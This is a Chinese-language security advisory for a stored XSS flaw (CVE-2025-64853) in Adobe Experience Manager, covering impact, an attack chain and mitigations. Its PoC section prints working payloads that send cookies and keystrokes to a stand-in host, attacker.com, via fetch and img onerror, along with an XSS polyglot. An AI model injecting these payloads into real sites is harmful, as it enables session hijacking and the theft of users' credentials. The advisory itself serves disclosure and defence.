Adobe Experience Manager 存储型XSS漏洞 (CVE-2025-64853)

漏洞信息

漏洞编号

CVE-2025-64853

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

CVE-2025-64853是Adobe Experience Manager（AEM）中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞影响AEM 6.5.23及更早版本，允许低权限攻击者将恶意JavaScript脚本注入到存在漏洞的表单字段中。当受害者浏览包含该恶意字段的页面时，攻击者注入的脚本将在受害者浏览器中执行，从而窃取会话Cookie、劫持用户会话、进行钓鱼攻击或执行其他恶意操作。由于攻击者只需要低权限即可实施攻击，且需要用户交互触发，因此该漏洞具有较高的实际威胁性。存储型XSS相比反射型XSS更加危险，因为恶意脚本被永久存储在服务器上，所有访问该页面的用户都会受到影响。Adobe已发布安全更新 APSB25-115 来修复此漏洞，建议用户尽快升级到AEM 6.5.24或更高版本以消除安全风险。

技术细节

Adobe Experience Manager的存储型XSS漏洞源于对用户输入内容缺乏充分的输入验证和输出编码。在AEM的表单处理模块中，当低权限用户提交包含恶意脚本的内容时，系统未能正确过滤HTML/JavaScript标签，直接将未转义的数据存储到数据库中。随后，当其他用户访问包含该表单字段的页面时，服务器从数据库读取数据并直接嵌入到HTML响应中，导致恶意脚本在用户浏览器中执行。攻击者可以利用此漏洞窃取受害者的认证令牌、修改页面内容、进行蠕虫传播或诱导用户进行非预期操作。漏洞的利用条件包括：攻击者拥有AEM的低权限账户，能够访问并编辑表单字段；受害者需要访问包含恶意脚本的页面；受害者需与页面产生交互行为（如鼠标悬停、点击等）以触发脚本执行。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标AEM实例版本，确认版本低于6.5.24且存在可编辑的表单字段

STEP 2

Initial Access

攻击者获取AEM低权限账户（如内容作者权限），登录系统

STEP 3

Payload Injection

攻击者将恶意JavaScript代码注入到表单字段中，绕过基本输入过滤

STEP 4

Persistence

恶意脚本被永久存储在AEM数据库中，无需持续攻击者参与

STEP 5

Social Engineering

攻击者诱导受害者访问包含恶意字段的页面

STEP 6

Execution

受害者浏览器解析页面时执行注入的恶意脚本

STEP 7

Impact

攻击者窃取会话Cookie、劫持用户会话、窃取敏感信息或执行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-64853 PoC - Adobe Experience Manager Stored XSS -->
<!-- Author: Security Researcher -->
<!-- Target: Adobe Experience Manager < 6.5.24 -->

<!-- Step 1: Inject malicious script into vulnerable form field -->
<!-- Replace TARGET_URL with actual AEM instance URL -->
<script>
  // Malicious payload to steal session cookies
  const stealCookie = () => {
    const cookies = document.cookie;
    // Send cookies to attacker-controlled server
    fetch('https://attacker.com/log?cookie=' + btoa(cookies), {
      method: 'GET',
      mode: 'no-cors'
    });
  };
  
  // Execute when page loads
  document.addEventListener('DOMContentLoaded', stealCookie);
</script>

<!-- Alternative payload - session hijacking -->
<img src=x onerror="fetch('https://attacker.com/steal?data='+document.cookie)">

<!-- Alternative payload - keylogging -->
<script>
  document.addEventListener('keypress', (e) => {
    fetch('https://attacker.com/log?key=' + e.key);
  });
</script>

<!-- XSS Polyglot payload -->
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert(1) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1)//\x3e

影响范围

Adobe Experience Manager 6.5.23及更早版本

Adobe Experience Manager 6.5.x < 6.5.24

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1) 限制低权限用户对表单字段的编辑权限；2) 实施严格的输入过滤规则，禁止HTML标签和JavaScript相关字符；3) 启用WAF规则检测和阻止XSS攻击向量；4) 监控AEM日志中的可疑脚本注入行为；5) 提醒用户在访问AEM页面时不要点击来源不明的链接；6) 考虑临时禁用非必要的表单功能。